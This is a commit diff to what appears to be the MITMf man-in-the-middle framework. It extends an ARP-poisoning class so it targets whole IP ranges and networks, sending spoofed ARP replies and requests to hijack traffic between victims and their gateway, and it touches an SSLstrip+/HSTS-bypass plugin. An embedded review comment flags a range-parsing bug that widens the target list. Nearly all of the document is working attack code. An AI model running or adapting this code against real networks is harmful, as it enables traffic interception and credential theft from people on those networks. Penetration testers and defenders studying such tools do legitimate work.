byt3bl33d3r 2015-06-08 13:38:45 +02:00
commit e3aa8ba617
3 changed files with 132 additions and 56 deletions


@ -1,5 +1,8 @@
import logging import logging
import threading import threading
from traceback import print_exc
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from time import sleep from time import sleep
from core.utils import shutdown from core.utils import shutdown
from scapy.all import * from scapy.all import *
@ -10,7 +13,11 @@ class ARPpoisoner():
def __init__(self, gateway, interface, mac, targets): def __init__(self, gateway, interface, mac, targets):
self.gatewayip = gateway try:
self.gatewayip = str(IPAddress(gateway))
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address as gateway")
self.gatewaymac = getmacbyip(gateway) self.gatewaymac = getmacbyip(gateway)
self.mymac = mac self.mymac = mac
self.targets = self.getTargetRange(targets) self.targets = self.getTargetRange(targets)
@ -24,21 +31,25 @@ class ARPpoisoner():
if targets is None: if targets is None:
return None return None
targetList = list() try:
targets = targets.split(",") targetList = []
for target in targets:
if "-" in target:
max_range = int(target.split("-")[1])
octets = target.split("-")[0].split(".")
f3_octets = ".".join(octets[0:3])
l_octet = int(octets[3])
for ip in xrange(l_octet, max_range+1): for target in targets.split(','):
targetList.append('{}.{}'.format(f3_octets, ip)) if '/' in target:
else: targetList.append(IPNetwork(target))
targetList.append(target)
return targetList elif '-' in target:
first_half = target.split('-')[0]
second_half = first_half + target.split('-')[1]
targetList.append(IPRange(first_half, second_half))
else:
targetList.append(IPAddress(target))
return targetList
except AddrFormatError as e:
shutdown("[ARPpoisoner] Specified an invalid IP address/range/network as target")
def start(self): def start(self):
if self.gatewaymac is None: if self.gatewaymac is None:
@ -81,22 +92,43 @@ class ARPpoisoner():
elif self.targets: elif self.targets:
#Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
for targetip in self.targets: for target in self.targets:
try:
targetmac = getmacbyip(targetip)
if targetmac is None: if type(target) is IPAddress:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) targetip = str(target)
elif targetmac: try:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug) targetmac = getmacbyip(targetip)
sleep(0.3)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e: if targetmac is None:
if "Interrupted system call" not in e: mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
print_exc()
pass
sleep(self.interval) sleep(self.interval)
@ -108,22 +140,42 @@ class ARPpoisoner():
sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
elif self.targets: elif self.targets:
for targetip in self.targets:
try:
targetmac = getmacbyip(targetip)
if targetmac is None: for target in self.targets:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac: if type(target) is IPAddress:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug) targetip = str(target)
sleep(0.3) try:
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug) targetmac = getmacbyip(targetip)
except Exception as e: if targetmac is None:
if "Interrupted system call" not in e: mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass elif targetmac:
send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
send(ARP(pdst=str(targetip), psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
send(ARP(pdst=self.gatewayip, psrc=str(targetip), hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
sleep(self.interval) sleep(self.interval)
@ -133,21 +185,43 @@ class ARPpoisoner():
sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2 sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
def restoreTarget(self, count): def restoreTarget(self, count):
for targetip in self.targets: for target in self.targets:
try:
targetmac = getmacbyip(targetip)
if targetmac is None: if type(target) is IPAddress:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) targetip = str(target)
elif targetmac: try:
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) targetmac = getmacbyip(targetip)
send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug) if targetmac is None:
sleep(0.3) mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e: elif targetmac:
if "Interrupted system call" not in e: mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
if (type(target) is IPRange) or (type(target) is IPNetwork):
for targetip in target:
try:
targetmac = getmacbyip(str(targetip))
if targetmac is None:
mitmf_logger.debug("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
elif targetmac:
mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
send(ARP(op="is-at", pdst=self.gatewayip, psrc=str(targetip), hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
send(ARP(op="is-at", pdst=str(targetip), psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
except Exception as e:
if "Interrupted system call" not in e:
mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
pass
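Review bot: In getTargetRange the `'-'` branch builds the upper bound as `first_half + target.split('-')[1]`, which appends the suffix to the full start address instead of replacing its last octet, so an input like `a.b.c.1-5` (the form the removed code accepted) would parse as the range `a.b.c.1` to `a.b.c.15`, and most other inputs are rejected as an invalid address. A silently widened range puts hosts outside the operator's intended scope on the target list, so the bound should be built from the first three octets, e.g. `second_half = first_half.rsplit('.', 1)[0] + '.' + target.split('-')[1]`. Separately, the per-address try/except body is now repeated for the single-address and the range/network case in each of the three loops, and only one copy calls `print_exc()`; since `IPRange` and `IPNetwork` are iterable, wrapping a lone `IPAddress` in a one-element list would let a single loop body serve both cases. The page shows the old and new columns merged, so the exact indentation and placement of these lines is inferred.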


@ -24,6 +24,7 @@ import logging
from plugins.plugin import Plugin from plugins.plugin import Plugin
from core.sslstrip.URLMonitor import URLMonitor from core.sslstrip.URLMonitor import URLMonitor
from core.servers.dns.DNSchef import DNSChef from core.servers.dns.DNSchef import DNSChef
from core.utils import IpTables
class HSTSbypass(Plugin): class HSTSbypass(Plugin):
name = 'SSLstrip+' name = 'SSLstrip+'


@ -1,5 +1,6 @@
Twisted Twisted
requests requests
netaddr
scapy scapy
msgpack-python msgpack-python
dnspython dnspython